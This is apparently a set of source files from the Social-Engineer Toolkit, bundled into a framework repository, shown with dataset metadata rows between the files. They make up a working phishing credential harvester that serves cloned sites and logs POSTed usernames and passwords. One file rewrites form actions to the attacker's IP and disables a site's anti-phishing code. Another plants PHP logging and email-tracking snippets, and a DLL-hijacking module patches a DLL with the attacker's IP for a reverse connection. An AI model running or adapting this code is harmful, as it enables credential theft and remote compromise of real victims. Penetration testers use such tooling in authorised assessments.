webroot = os.path.abspath(os.path.join(userconfigpath, 'web_clone'))
requested_file = os.path.abspath(os.path.join(webroot, os.path.relpath(self.path, '/')))
# try block setup to catch transmission errors
try:
if self.path == "/":
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
fileopen = open(userconfigpath + "web_clone/index.html", "r")
for line in fileopen:
line = line.encode('utf-8')
self.wfile.write(line)
# write out that we had a visit
visits.write("hit\n")
# visits.close()
# used for index2
elif self.path == "/index2.html":
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
fileopen = open(userconfigpath + "web_clone/index2.html", "r")
for line in fileopen:
line = line.encode('utf-8')
self.wfile.write(line)
# write out that we had a visit
visits.write("hit\n")
# visits.close()
else:
if os.path.isfile(requested_file):
path = self.translate_path(self.path, webroot)
ctype = self.guess_type(path)
fileopen = open(requested_file, "rb")
fs = os.fstat(fileopen.fileno())
self.send_response(200)
self.send_header("Content-Type", ctype)
self.send_header("Content-Length", str(fs[6]))
self.end_headers()
self.copyfile(fileopen, self.wfile)
else:
self.send_response(404)
self.end_headers()
# handle errors, log them and pass through
except Exception as e:
# log to set
log(e)
# pass exceptions to keep going
pass
# handle POST requests
def do_POST(self):
length = int(self.headers.get('content-length'))
#length = length.decode('utf-8')
qs = self.rfile.read(length)
url = urldecode(qs)
# specify we had a bite
bites.write("hit\n")
url = url.split("&")
# change path to root for append on file
os.chdir(homepath)
# put the params into site.template for later user
filewrite = open(userconfigpath + "site.template", "a")
filewrite.write("\n")
if not os.path.isfile("%s/src/logs/harvester.log" % (os.getcwd())):
filewrite3 = open("%s/src/logs/harvester.log" % os.getcwd(), "w")
filewrite3.write("")
filewrite3.close()
filewrite2 = open("%s/src/logs/harvester.log" % os.getcwd(), "a")
filewrite.write("\n\n")
print(bcolors.RED + "[*] WE GOT A HIT! Printing the output:\r" + bcolors.GREEN)
for line in url:
counter = 0
line = line.rstrip()
# if regular expression hit on user fields then do different
match = re.search(
"Email|email|login|logon|Logon|Login|user|username|Username|User", line)
if match:
print(bcolors.RED + "POSSIBLE USERNAME FIELD FOUND: " + line + "\r" + bcolors.GREEN)
counter = 1
match2 = re.search(
"pwd|pass|uid|uname|Uname|userid|userID|USER|USERNAME|PIN|pin|password|Password|secret|Secret|Pass", line)
if match2:
# if you don't want to capture a password, turn this off, note
# not an exact science
log_password = check_config("HARVESTER_LOG_PASSWORDS=")
if log_password.lower() == "on":
print(bcolors.RED + "POSSIBLE PASSWORD FIELD FOUND: " + line + "\r" + bcolors.GREEN)
else:
line = ""
counter = 1
filewrite.write(html.escape("PARAM: " + line + "\n"))
filewrite2.write(line + "\n")
# if a counter hits at 0 then print this line
if counter == 0:
print("PARAM: " + line + "\r")
# reset counter
counter = 0
filewrite.write("BREAKHERE")
filewrite.close()
filewrite2.close()
if attack_vector != 'multiattack':
print(bcolors.RED + "[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.\r\n\r\n" + bcolors.ENDC)
# pull URL field
counter = 0
fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen:
line = line.rstrip()
match = re.search("URL=", line)
if match:
RAW_URL = line.replace("URL=", "")
URL = line.replace("URL=http://", "")
URL = line.replace("URL=https://", "")
counter = 1
if counter == 0:
URL = ''
# this checks the set_config to see if we need to redirect to a
# different website instead of the one cloned
harvester_redirect = check_config("HARVESTER_REDIRECT=")
if harvester_redirect.lower() == "on":
RAW_URL = check_config("HARVESTER_URL=")
counter = 1
# when done posting send them back to the original site
self.send_response(302, 'Found')
self.send_header('Location', RAW_URL)
self.end_headers()
htmll = ('<!doctype html><html><head><meta http-equiv="refresh" content="0; url=%s"><title>Loading...</title></head><body></body></html>' % (RAW_URL)).encode('utf-8')
self.wfile.write(htmll)
# set it back to our homepage
os.chdir(userconfigpath + "web_clone/")
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def run():
# check if we are not running apache mode
if apache_check == False:
try:
server = ThreadedHTTPServer(('', int(web_port)), SETHandler)
server.serve_forever()
# handle keyboard interrupts
except KeyboardInterrupt:
server.socket.close()
generate_reports()
# handle the rest
except Exception as e:
print(bcolors.RED + "[*] Looks like the web_server can't bind to 80. Are you running Apache or NGINX?" + bcolors.ENDC)
apache_stop = input("Do you want to attempt to disable Apache? [y/n]: ")
apache_counter = 0
if apache_stop == "yes" or apache_stop == "y" or apache_stop == "":
if os.path.isfile("/etc/init.d/apache2"):
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
apache_counter = 1
if os.path.isfile("/etc/init.d/httpd"):
subprocess.Popen("/etc/init.d/httpd stop", shell=True).wait()
apache_counter = 1
if os.path.isfile("/etc/init.d/nginx"):
subprocess.Popen("/etc/init.d/nginx stop", shell=True).wait()
apache_counter = 1
if apache_counter == 1:
# check if we are running apache mode
print_status("Successfully stopped Apache. Starting the credential harvester.")
print_status("Harvester is ready, have victim browse to your site.")
if apache_check == False:
try:
try:
server = ThreadedHTTPServer(
('', int(web_port)), SETHandler)
server.serve_forever()
# handle keyboard interrupts
except KeyboardInterrupt:
generate_reports()
server.socket.close()
except Exception:
apache_counter = 0
#if apache_counter == 0:
# print(bcolors.GREEN + "[*] Try disabling Apache and try SET again." + bcolors.ENDC)
# print("[*] Printing error: " + str(e) + "\n")
# return_continue()
# exit_set()
# if we are using apache, then use the harvester php type that writes it out to post.php
# note just change the index.html to post somewhere else and rename the
# post.php to something else
if apache_check == True:
try:
ipaddr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr.connect(('127.0.0.1', int(web_port)))
ipaddr.settimeout(2)
if ipaddr:
pass
except Exception as e:
if os.path.isfile("/etc/init.d/apache2"):
apache_start = input("[!] Apache may be not running, do you want SET to start the process? [y/n]: ")
if apache_start == "y":
subprocess.Popen("/etc/init.d/apache2 start", shell=True).wait()
try:
apache_dir = check_config("APACHE_DIRECTORY=")
if os.path.isdir(apache_dir + "/html"):
apache_dir = apache_dir + "/html"
print(bcolors.GREEN + "Apache webserver is set to ON. Copying over PHP file to the website.")
except Exception as e:
print(e)
print("Please note that all output from the harvester will be found under apache_dir/harvester_date.txt")
print("Feel free to customize post.php in the %s directory" % (apache_dir) + bcolors.ENDC)
filewrite = open("%s/post.php" % (apache_dir), "w")
now = str(datetime.datetime.today())
harvester_file = ("harvester_" + now + ".txt")
filewrite.write("""<?php $file = '%s';file_put_contents($file, print_r($_POST, true), FILE_APPEND); \n/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */ ?><meta http-equiv="refresh" content="0; url=%s" />\n""" % (harvester_file, RAW_URL))
filewrite.close()
if os.path.isdir("/var/www/html"):
logpath = ("/var/www/html")
filewrite = open("%s/%s" % (logpath, harvester_file), "w")
filewrite.write("")
filewrite.close()
# Check sys platform to perform chown
if sys.platform == "darwin":
subprocess.Popen("chown _www:_www '%s/%s'" % (logpath, harvester_file), shell=True).wait()
else:
subprocess.Popen("chown www-data:www-data '%s/%s'" % (logpath, harvester_file), shell=True).wait()
# if we are using webjacking, etc.
if os.path.isfile(userconfigpath + "web_clone/index2.html"):
# need to copy the files over - remove the old one first if there
if os.path.isfile(apache_dir + "/index2.html"):
os.remove(apache_dir + "/index2.html")
shutil.copyfile(userconfigpath + "web_clone/index2.html", apache_dir + "/index2.html")
# here we specify if we are tracking users and such
if track_email == True:
fileopen = open(userconfigpath + "web_clone/index.html", "r")
data = fileopen.read()
data = data.replace("<body>", """<body><?php $file = '%s'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (harvester_file))
filewrite = open(userconfigpath + "web_clone/index.2", "w")
filewrite.write(data)
filewrite.close()
os.remove(userconfigpath + "web_clone/index.html")
shutil.copyfile(userconfigpath + "web_clone/index.2", userconfigpath + "web_clone/index.html")
# copy the entire web_clone directory.
# Without this only index.php|html are copied even though the user
# may have chosen to import the entire directory in the set module.
copyfolder(userconfigpath + "web_clone", apache_dir)
if os.path.isfile("%s/index.html" % (apache_dir)): os.remove("%s/index.html" % (apache_dir))
if track_email == False: shutil.copyfile(userconfigpath + "web_clone/index.html", "%s/index.html" % (apache_dir))
if track_email == True:
shutil.copyfile(userconfigpath + "web_clone/index.html", "%s/index.php" % (apache_dir))
print_status("NOTE: The URL to click on is index.php NOT index.html with track emails.")
print_status("All files have been copied to %s" % (apache_dir))
if attack_vector != 'multiattack':
try:
print_status("SET is now listening for incoming credentials. You can control-c out of this and completely exit SET at anytime and still keep the attack going.")
print_status("All files are located under the Apache web root directory: " + apache_dir)
print_status("All fields captures will be displayed below.")
print("[Credential Harvester is now listening below...]\n\n")
tail(apache_dir + "/" + harvester_file)
except KeyboardInterrupt:
print_status("Exiting the menu - note that everything is still running and logging under your web directory path: " + apache_dir)
pause = input("{Press return to continue}")
class SecureHTTPServer(HTTPServer):
def __init__(self, server_address, HandlerClass):
try:
SocketServer.BaseServer.__init__(self, server_address, HandlerClass)
except NameError:
socketserver.BaseServer.__init__(self, server_address, HandlerClass)
# SSLv2 and SSLv3 supported
ctx = SSL.Context(SSL.SSLv23_METHOD)
# pem files defined before
fpem_priv = 'newreq.pem'
fpem_cli = 'newcert.pem'
# establish private key
ctx.use_privatekey_file(fpem_priv)
# establish public/client certificate
ctx.use_certificate_file(fpem_cli)
# setup the ssl socket
self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
# bind to interface
self.server_bind()
# activate the interface
self.server_activate()
def shutdown_request(self, request):
try:
pass
except Exception as e:
request.shutdown()
def ssl_server(HandlerClass=SETHandler, ServerClass=SecureHTTPServer):
try:
# bind to all interfaces on 443
server_address = ('', 443) # (address, port)
# setup the httpd server
server = ServerClass(server_address, HandlerClass)
# serve the httpd server until exit
server.serve_forever()
except Exception as e:
print_error("Something went wrong.. Printing error: " + str(e))
except KeyboardInterrupt:
generate_reports()
def generate_reports():
os.chdir(homepath)
try:
visits.close()
bites.close()
except:
pass
if attack_vector != 'multiattack':
try:
module_reload(src.webattack.harvester.report_generator)
except:
import src.webattack.harvester.report_generator
if attack_vector != 'multiattack':
return_continue()
if track_email == True:
webattack_email = True
# if emailer webattack, spawn email questions
if webattack_email == True:
try:
import src.phishing.smtp.client.smtp_web
except Exception as e:
module_reload(src.phishing.smtp.client.smtp_web)
# see if we're tabnabbing or multiattack
fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen:
line = line.rstrip()
if line == 'tabnabbing':
print(bcolors.RED + "\n[*] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs.")
if apache_check == True:
print_status("You may need to copy /var/www/* into /var/www/html depending on where your directory structure is.")
input("Press {return} if you understand what we're saying here.")
if line == 'webjacking': print(bcolors.RED + "\n[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.")
if ssl_flag == 'true':
web_port = "443"
# check for PEM files here
if not os.path.isfile(userconfigpath + "newreq.pem"):
print("PEM files not detected. SSL will not work properly.")
if not os.path.isfile(userconfigpath + "newcert.pem"):
print("PEM files not detected. SSL will not work properly.")
# copy over our PEM files
subprocess.Popen("cp %s/*.pem %s/web_clone/" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# copy patched socket over to web clone
definepath = os.getcwd()
# we need to move a modified version of socket to handle SSL
#shutil.copyfile("%s/src/core/patched/socket.py" % (definepath), "%s/socket.py" % (definepath))
# head over to cloned dir
if apache_check == False:
os.chdir(userconfigpath + "web_clone/")
if attack_vector != "multiattack":
if apache_check == False:
print(bcolors.BLUE + "[*] The Social-Engineer Toolkit Credential Harvester Attack\r\n[*] Credential Harvester is running on port " + web_port + "\r")
print("[*] Information will be displayed to you as it arrives below:\r" + bcolors.ENDC)
else:
print(bcolors.BLUE + "[*] Apache is set to ON - everything will be placed in your web root directory of apache.")
print(bcolors.BLUE + "[*] Files will be written out to the root directory of apache.")
print(bcolors.BLUE + "[*] ALL files are within your Apache directory since you specified it to ON.")
# catch all
try:
# if we are using ssl
if ssl_flag == 'true':
print_status("Starting built-in SSL server")
ssl_server()
# if we aren't using ssl
if ssl_flag == 'false':
run()
except:
# cleanup modified socket
#if ssl_flag == "true":
#if os.path.isfile(definepath + "/socket.py"):
# os.remove(definepath + "/socket.py")
#if os.path.isfile(definepath + "/socket.pyc"):
# os.remove(definepath + "/socket.pyc")
pass
| 29,492 | Python | .py | 635 | 36.505512 | 343 | 0.601377 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,815 | scraper.py | CHEGEBB_africana-framework/externals/set/src/webattack/harvester/scraper.py | #!/usr/bin/env python3
import os
import sys
import re
import subprocess
import urllib
import shutil
from src.core.setcore import *
#
# Scraper will grab the cloned website and try defining post parameters
#
# grab ipaddr
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = input(setcore.setprompt(
"0", "IP address to connect back on: "))
update_options("IPADDR=" + ipaddr)
# set the multiattack tabnabbing/webjacking flag
multi_tabnabbing = "off"
multi_webjacking = "off"
if os.path.isfile(userconfigpath + "multi_tabnabbing"):
multi_tabnabbing = "on"
if os.path.isfile(userconfigpath + "multi_webjacking"):
multi_webjacking = "on"
# see if we're tabnabbing
fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen:
line = line.rstrip()
if line == 'tabnabbing' or multi_tabnabbing == "on" or line == 'webjacking' or multi_webjacking == "on":
site = 'index2.html'
else:
site = 'index.html'
# set ssl flag to false by default
ssl_flag = "false"
# SEE IF WE WANT TO USE SSL
ssl_check = check_config("WEBATTACK_SSL=").lower()
if ssl_check == "on":
ssl_flag = "true"
# check apache mode
apache_mode = check_config("APACHE_SERVER=").lower()
# if we are turned on this will change to /post.php
track_user = check_config("TRACK_EMAIL_ADDRESSES=").lower()
if track_user == "on":
apache_mode = "on"
apache_rewrite = ""
# if we are turned on, change this
if apache_mode == "on":
apache_rewrite = "post.php"
# start the scraping process
fileopen = open(userconfigpath + "web_clone/%s" % (site), "r", encoding='utf-8', errors='ignore').readlines()
filewrite = open(userconfigpath + "web_clone/index.html.new", "w")
for line in fileopen:
# specify if it found post params
counter = 0
# if we hit on a post method
match = re.search('post', line, flags=re.IGNORECASE)
method_post = re.search("method=post", line, flags=re.IGNORECASE)
if match or method_post:
# regex for now, can probably use htmlparser later, but right not what its doing is
# replacing any url on the "action" field with your victim IP which will have a custom
# web server running to post the data to your site
if ssl_flag == 'false':
line = re.sub(
'action="http?\w://[\w.\?=/&]*/', 'action="http://%s/' % (ipaddr), line)
if apache_mode == "on":
line = re.sub(
'action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
if ssl_flag == 'true':
line = re.sub(
'action="http?\w://[\w.\?=/&]*/', 'action="https://%s/' % (ipaddr), line)
if apache_mode == "on":
line = re.sub(
'action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
# this is if twitter is in use, we rename a function name to something
# garbage to remove password phishing restrictions
match2 = re.search(
"swiftActionQueue={buckets:j", line, flags=re.IGNORECASE)
if match2:
# garble the buckets name, causes password to not be jacked
line = line.replace(
"swiftActionQueue={buckets:j", "swiftActionQueue={3buckets:j")
filewrite.write(line)
# close the file
filewrite.close()
# move our newly created website with our post stuff to our cloned area
if os.path.isfile(userconfigpath + "web_clone/index.html.new"):
shutil.copyfile(userconfigpath + "web_clone/index.html.new", userconfigpath + "" + site)
if os.path.isfile(userconfigpath + "web_clone/" + site):
os.remove(userconfigpath + "web_clone/" + site)
shutil.move(userconfigpath + "web_clone/index.html.new",
userconfigpath + "web_clone/%s" % (site))
| 3,777 | Python | .py | 92 | 35.771739 | 109 | 0.651214 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,816 | multiattack.py | CHEGEBB_africana-framework/externals/set/src/webattack/multi_attack/multiattack.py | #!/usr/bin/env python3
import re
import sys
import os
import subprocess
import time
import signal
# Grab the central imports
definepath = os.getcwd()
sys.path.append(definepath)
from src.core.setcore import *
operating_system = check_os()
me = mod_name()
#######################################################
# Heres the brains behind the multiattack vector.
# This preps each check and payload for each attack
# vector.
#######################################################
def return_menu():
print_status("Option added. You may select additional vectors")
time.sleep(2)
print("""\nSelect which additional attacks you want to use:\n""")
# option designators needed to ensure its defined ahead of time
java_applet = "off"
meta_attack = "off"
harvester = "off"
tabnabbing = "off"
mlitm = "off"
webjacking = "off"
# turning flag on
def flag_on(vector):
print_info("Turning the %s Attack Vector to " %
(vector) + bcolors.GREEN + "ON" + bcolors.ENDC)
# turning flag off
def flag_off(vector):
print_info("Turning the %s Attack Vector to " %
(vector) + bcolors.RED + "OFF" + bcolors.ENDC)
# filewriting
def write_file(filename, results):
filewrite = open(userconfigpath + "%s" % (filename), "w")
filewrite.write(results)
filewrite.close()
# specify attackvector
filewrite = open(userconfigpath + "attack_vector", "w")
filewrite.write("multiattack")
filewrite.close()
# on and off switch detection variable
trigger = ""
# set toggle flags here
toggleflag_java = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_meta = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_harv = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_tabnab = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_mlitm = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_webjacking = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# grab current path
definepath = os.getcwd()
# default flag for webdav to be off
webdav_enable = "OFF"
# see if we are running a custom cloned website
clonedurl = 0
fileopen = open(userconfigpath + "site.template", "r")
data = fileopen.read()
if "TEMPLATE=SELF" in data:
clonedurl = 1
# clean up cloner directory
if clonedurl == 0:
subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (userconfigpath, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# set a quick loop to see what the user wants
a = 1
print ("""
[*************************************************************]
Multi-Attack Web Attack Vector
[*************************************************************]
The multi attack vector utilizes each combination of attacks
and allow the user to choose the method for the attack. Once
you select one of the attacks, it will be added to your
attack profile to be used to stage the attack vector. When
your finished be sure to select the 'I'm finished' option.""")
print("""\nSelect which attacks you want to use:
""")
while a == 1:
trigger = ""
print(" 1. Java Applet Attack Method" + toggleflag_java)
print(" 2. Metasploit Browser Exploit Method" + toggleflag_meta)
print(" 3. Credential Harvester Attack Method" + toggleflag_harv)
print(" 4. Tabnabbing Attack Method" + toggleflag_tabnab)
print(" 5. Web Jacking Attack Method" + toggleflag_webjacking)
print(" 6. Use them all - A.K.A. 'Tactical Nuke'")
print(" 7. I'm finished and want to proceed with the attack")
print("\n 0. Return to Main Menu\n")
profile = input(
setprompt(["2", "16"], "Enter selections one at a time (7 to finish)"))
if profile == "":
profile = "7"
# if the option is something other than 1-7 flag invalid option
# this will make sure its an integer, if not assign an 9 which will
# trigger invalid option
try: # this will trigger an error if it isnt an integer
profile = int(profile)
# convert it back
profile = str(profile)
# if it triggers an exception reassign profile to option 8
except:
profile = "10"
# if you want to return to main menu
if profile == "0":
break
# trigger invalid option
if int(profile) >= 10:
input("\nInvalid option..")
return_continue()
if profile == "6":
if operating_system == "windows":
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
print(bcolors.RED + (r"""
..-^~~~^-..
.~ ~.
(;: :;)
(: :)
':._ _.:'
| |
(=====)
| |
| |
| |
((/ \))""") + bcolors.ENDC)
print("\nSelecting everything SET has in its aresenal, you like sending a nuke don't you?")
print("\n[*] Note that tabnabbing is not enabled in the tactical nuke, select manually if you want.\n")
java_applet = "on"
meta_attack = "on"
harvester = "on"
break
if profile == "7":
break
# java applet on/off
if profile == "1":
if java_applet == "off":
flag_on("Java Applet")
return_menu()
java_applet = "on"
trigger = 1
# toggle_flags here
toggleflag_java = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if java_applet == "on":
if trigger != 1:
flag_off("Java Applet")
return_menu()
java_applet = "off"
# toggle flags here
toggleflag_java = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# metasploit client_side on/off
if profile == "2":
if operating_system == "windows":
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
if meta_attack == "off":
flag_on("Metasploit Client Side")
return_menu()
meta_attack = "on"
trigger = 1
# toggle flags here
toggleflag_meta = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if meta_attack == "on":
if trigger != 1:
flag_off("Metasploit Client Side")
return_menu()
meta_attack = "off"
# toggle flags here
toggleflag_meta = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# harvester on/off
if profile == "3":
if harvester == "off":
flag_on("Harvester")
return_menu()
harvester = "on"
trigger = 1
# toggle flags here
toggleflag_harv = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm = "off"
toggleflag_mlitm = (bcolors.RED + " (OFF)" + bcolors.ENDC)
if harvester == "on":
if trigger != 1:
flag_off("Harvester")
return_menu()
harvester = "off"
# toggle flags here
toggleflag_harv = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# if tabnabbing is enabled, no need for harvester to be enabled as well
if profile == "4":
if tabnabbing == "off":
flag_on("Tabnabbing")
return_menu()
tabnabbing = "on"
trigger = 1
harvester = "on"
# toggle flags here
toggleflag_tabnab = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm = "off"
toggleflag_mlitm = (bcolors.RED + " (OFF)" + bcolors.ENDC)
print(webjacking)
if webjacking == "on":
webjacking = "off"
toggleflag_webjacking = (bcolors.RED + " (OFF)" + bcolors.ENDC)
if tabnabbing == "on":
if trigger != 1:
flag_off("Tabnabbing")
return_menu()
tabnabbing = "off"
harvester = "off"
# toggle flags here
toggleflag_tabnab = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# turn webjacking on
if profile == "5":
if webjacking == "off":
flag_on("Web Jacking")
webjacking = "on"
return_menu()
trigger = 1
if tabnabbing == "on" or mlitm == "on":
print("[*] You cannot use MLITM and Tabnabbing in the same attack!")
print("[*] Disabling MLITM and/or Tabnabbing")
mlitm = "off"
tabnabbing = "off"
harvester = "on"
# toggle flags here
toggleflag_mlitm = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
toggleflag_tabnab = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_harv = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if harvester == "off":
harvester = "on"
toggleflag_harv = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
toggleflag_webjacking = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if webjacking == "on":
if trigger != 1:
flag_off("Web Jacking")
return_menu()
webjacking = "off"
# toggle flags here
toggleflag_webjacking = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# next series of flags needed
payloadgen = 0
# write handler files for detection
if java_applet == "on":
write_file("multi_java", "multiattack=java_on")
if meta_attack == "on":
write_file("multi_meta", "multiattack=meta_on")
if tabnabbing == "on":
write_file("multi_tabnabbing", "multiattack=tabnabbing_on")
if harvester == "on":
write_file("multi_harvester", "multiattack=harvester_on")
if mlitm == "on":
write_file("multi_mlitm", "multiattack=mlitm_on")
if webjacking == "on":
write_file("multi_webjacking", "multiattack=webjacking_on")
# hit cloner flag
# if any of the flags are turned on, then trigger to see if ARP Cache
# needs to be enabled
if java_applet == "on" or meta_attack == "on" or harvester == "on" or tabnabbing == "on" or mlitm == "on":
# web cloner start here
sys.path.append("src/webattack/web_clone")
debug_msg(me, "importing 'src.webattack.web_clone.cloner'", 1)
try:
module_reload(cloner)
except:
import cloner
# arp cache attack, will exit quickly
# if not in config file
if operating_system != "windows":
sys.path.append("src/core/arp_cache")
debug_msg(me, "importing 'src.core.arp_cache.arp'", 1)
try:
module_reload(arp)
except:
import arp
# start the stuff for java applet
if java_applet == "on":
sys.path.append("src/core/payloadgen/")
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'", 1)
try:
module_reload(create_payloads)
except:
import create_payloads
payloadgen = 1
applet_choice()
# start the stuff for metasploit client side
if meta_attack == "on":
sys.path.append("src/webattack/browser_exploits/")
import gen_payload
# this checks to see if the MSF payload uses webdav, if so we have to
# force port 80
if os.path.isfile(userconfigpath + "webdav_enabled"):
webdav_enabled = "on"
# set this incase msf attack, java applet, and harvester is needed
pexpect_flag = "off"
# start the stuff for harvester
if harvester == "on" or tabnabbing == "on" or webjacking == "on":
if tabnabbing == "on" or webjacking == "on":
# if tabnabbing is on, set th tabnabbing to on
sys.path.append("src/webattack/tabnabbing")
debug_msg(me, "importing 'src.webattack.tabnabbing.tabnabbing'", 1)
try:
module_reload(tabnabbing)
except:
import tabnabbing
# if the harvester is on set the multi_harvester flag
sys.path.append("src/webattack/harvester")
if java_applet == "on" or meta_attack == "on":
pexpect_flag = "on"
a = subprocess.Popen(
"python3 src/webattack/harvester/harvester.py", shell=True)
# start stuff for mlitm
if mlitm == "on":
sys.path.append("src/webattack/mlitm")
if java_applet == "on" or meta_attack == "on":
a = subprocess.Popen("python3 src/mlitm/mlitm.py")
else:
debug_msg(me, "importing 'src.mlitm.mlitm'", 1)
try:
module_reload(mlitm)
except:
import mlitm
# start the web server
if java_applet == "on" or meta_attack == "on":
sys.path.append("src/html/")
debug_msg(me, "importing 'src.html.spawn'", 1)
try:
module_reload(spawn)
except:
import spawn
# if using cred harvester or tabnabbing
if harvester == "on" or tabnabbing == "on":
os.chdir(definepath)
sys.path.append("%s/src/webattack/harvester/" % (definepath))
import report_generator
try:
# a.terminate only works on Python > 2.6
a.terminate()
except AttributeError:
# if it fails pull pid for subprocess thread then terminate it
os.kill(a.pid, signal.SIGTERM)
print_status("\nReport exported.")
return_continue()
| 13,603 | Python | .py | 349 | 30.30659 | 115 | 0.569458 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,817 | webprofiler.py | CHEGEBB_africana-framework/externals/set/src/webattack/profiler/webprofiler.py | #!/usr/bin/env python3
#
# victim profile code here
#
from src.core.setcore import return_continue, print_info
def prep_website():
print_info("This feature is currently under development and disabled.")
return_continue()
prep_website()
| 248 | Python | .py | 9 | 25.222222 | 75 | 0.770213 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,818 | hijacking.py | CHEGEBB_africana-framework/externals/set/src/webattack/dll_hijacking/hijacking.py | #!/usr/bin/env python3
##################################
# Code behind the DLL Hijacker
####################################
import os
import re
import subprocess
import time
import sys
import glob
import binascii
from src.core.menu.text import dll_hijacker_text
from src.core.setcore import *
definepath = os.getcwd()
try:
import zipfile
except ImportError as error:
log(error)
print("Module 'zipfile' was not detected, please download and install the python zipfile module")
exit_set()
print(dll_hijacker_text)
# open the repository, its simple name,extension,dll
fileopen = open("src/webattack/dll_hijacking/repository", "r")
# set base counter for our pick
print(" Enter the choice of the file extension you want to attack:\n")
counter = 1
for line in fileopen:
line = line.split(",")
print(" " + str(counter) + ". " + line[0])
counter = counter + 1
print("\n")
choice = input(setprompt(["2", "15"], ""))
if choice == 'exit':
exit_set()
if choice == "":
choice = "1"
choice = int(choice)
# reset the counter and get our payload ready and selected
counter = 1
fileopen = open("src/webattack/dll_hijacking/repository", "r")
for line in fileopen:
line = line.split(",")
if int(counter) == int(choice):
name = line[0].rstrip()
extension = "." + line[1].rstrip()
dll = line[2].rstrip()
counter = counter + 1
print("\n [*] You have selected the file extension of %s and vulnerable dll of %s" % (extension, dll))
# prep the directories
subprocess.Popen("mkdir " + userconfigpath + "dll", stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True).wait()
filename1 = input(setprompt(
["2", "15"], "Enter the filename for the attack (example:openthis) [openthis]"))
if filename1 == "":
filename1 = "openthis"
# move the files there using the correct extension and file type
filewrite = open(userconfigpath + "dll/%s%s" % (filename1, extension), "w")
filewrite.write("EMPTY")
filewrite.close()
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = input(setprompt(["2", "15"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
# replace ipaddress with one that we need for reverse connection back
fileopen = open("src/webattack/dll_hijacking/hijacking.dll", "rb")
data = fileopen.read()
filewrite = open(userconfigpath + "dll/%s" % (dll), "wb")
host = int(len(ipaddr) + 1) * "X"
filewrite.write(data.replace(bytes(host, 'utf-8'), bytes(ipaddr, 'utf-8') + b"\x00", 1))
filewrite.close()
# ask what they want to use
print("""
Do you want to use a zipfile or rar file. Problem with zip
is they will have to extract the files first, you can't just
open the file from inside the zip. Rar does not have this
restriction and is more reliable
1. Rar File
2. Zip File
""")
# flag a choice
choice = input(setprompt(["2", "15"], "[rar]"))
# if default was selected just do rar
if choice == "":
choice = "1"
# if its not a rar file
if choice != "1":
# if its not a zipfile, you messed up
if choice != "2":
# default to rar file
choice = "1"
# if its choice 1 do some rar stuff
if choice == "1":
# basic counter
counter = 0
# look for rar in default directories
rar_check = subprocess.Popen("rar", shell=True, stdout=subprocess.PIPE)
# comunicate with the process
stdout_value = rar_check.communicate()[0]
# do a search to see if rar is present
match = re.search(b"Add files to archive", stdout_value)
# we get a hit?
if match:
subprocess.Popen("cd %s/dll;rar a %s/template.rar * 1> /dev/null 2> /dev/null" %
(userconfigpath, userconfigpath), shell=True).wait()
counter = 1
# if we didnt find rar
if counter == 0:
print("[!] Error, rar was not detected. Please download rar and place it in your /usr/bin or /usr/local/bin directory.")
print("[*] Defaulting to zipfile for the attack vector. Sorry boss.")
choice = "2"
